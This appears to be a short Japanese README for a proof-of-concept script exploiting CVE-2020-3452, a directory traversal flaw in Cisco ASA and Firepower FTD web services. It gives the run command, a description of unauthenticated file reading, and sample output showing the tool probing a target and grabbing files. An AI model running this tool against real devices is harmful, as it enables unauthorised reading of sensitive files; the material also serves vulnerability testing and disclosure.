
CVE-2020-3452 - Cisco Adaptive Security Appliance (ASA) ソフトウェア および Cisco Firepower Threat Defense (FTD) トラバーサル
使用方法: CVE-2020-3452.py https://target
脆弱性の説明: Cisco Adaptive Security Appliance (ASA) Software および Cisco Firepower Threat Defense (FTD) Software の Web サービスインターフェイスにおける脆弱性により、認証されていないリモート攻撃者がディレクトリトラバーサル攻撃を実行し、標的システム上の機密ファイルを読み取る可能性があります。
サンプル出力:
➜ Cisco-ASA-FTD-Web-Services-Traversal git:(main) ✗ python CVE-2020-3452.py https://target
+-------------------------------------------------------------+
- [ Cisco ASA / FTD Web Services Traversal Vulnerability ]
- -[ CVE-2020-3452 - PoC by: LiquidSky ^_^ ]-
+-------------------------------------------------------------+
[*] Checking potential target : https://target
[+] https://target is vulnerable...
[+] Grabbing logo.gif from the host.
[+] https://target is vulnerable...
[+] Grabbing http_auth.html from the host.
[+] https://target is vulnerable...